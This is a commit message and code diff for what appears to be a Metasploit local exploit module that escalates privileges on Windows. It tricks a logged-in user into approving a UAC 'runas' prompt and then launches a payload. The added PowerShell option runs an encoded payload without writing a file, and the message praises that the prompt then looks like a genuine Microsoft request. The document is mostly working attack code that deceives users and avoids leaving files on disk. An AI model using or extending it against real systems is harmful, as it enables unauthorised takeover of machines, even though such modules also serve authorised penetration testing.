Added PSH option to windows/local/ask exploit

Gives you the ability to use powershell to 'ask' for admin rights if the
user has them.  Using powershell makes the pop up blue instead of orange
and states that the company is Microsoft, it also doesn't drop an exe
on the system.  Looks like 32 bit https works but if you migrate out you
loose priv and if you run cachedump the session hangs.

Author: jamesbcook

modules/exploits/windows/local/ask.rb

@@ -7,12 +7,14 @@
 
 require 'msf/core'
 require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Exploit::EXE
   include Post::File
+  include Exploit::Powershell
 
   def initialize(info={})
     super( update_info( info,
@@ -23,21 +25,25 @@ def initialize(info={})
         UAC settings.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'mubix' ],
+      'Author'        => [
+          'mubix', # Original technique
+          'b00stfr3ak' # Added powershell option
+      ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
       'References'    => [
         [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
       ],
-      'DisclosureDate'=> "Jan 3 2012"
+      'DisclosureDate'=> "Jan 3 2012",
     ))
 
     register_options([
       OptString.new("FILENAME", [ false, "File name on disk"]),
       OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
     ])
 
   end
@@ -71,31 +77,42 @@ def exploit
     #
     # Generate payload and random names for upload
     #
-    payload = generate_payload_exe
 
-    if datastore["FILENAME"]
-      payload_filename = datastore["FILENAME"]
+    if datastore["TECHNIQUE"] == "EXE"
+      if datastore["UPLOAD"]
+        exe_payload = generate_exe_payload_exe
+
+        if datastore["FILENAME"]
+          payload_filename = datastore["FILENAME"]
+        else
+          payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+        end
+
+        if datastore["PATH"]
+          payload_path = datastore["PATH"]
+        else
+          payload_path = session.fs.file.expand_path("%TEMP%")
+        end
+
+        cmd_location = "#{payload_path}\\#{payload_filename}"
+
+        if datastore["UPLOAD"]
+          print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+          fd = session.fs.file.new(cmd_location, "wb")
+          fd.write(exe_payload)
+          fd.close
+        end
+
+        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
+      else
+        print_error("No Upload Path!")
+        return
+      end
     else
-      payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+      command = cmd_psh_payload(payload.encoded)
+      arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
+      session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
     end
-
-    if datastore["PATH"]
-      payload_path = datastore["PATH"]
-    else
-      payload_path = session.fs.file.expand_path("%TEMP%")
-    end
-
-    cmd_location = "#{payload_path}\\#{payload_filename}"
-
-    if datastore["UPLOAD"]
-      print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
-      fd = session.fs.file.new(cmd_location, "wb")
-      fd.write(payload)
-      fd.close
-    end
-
-    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-
   end
 end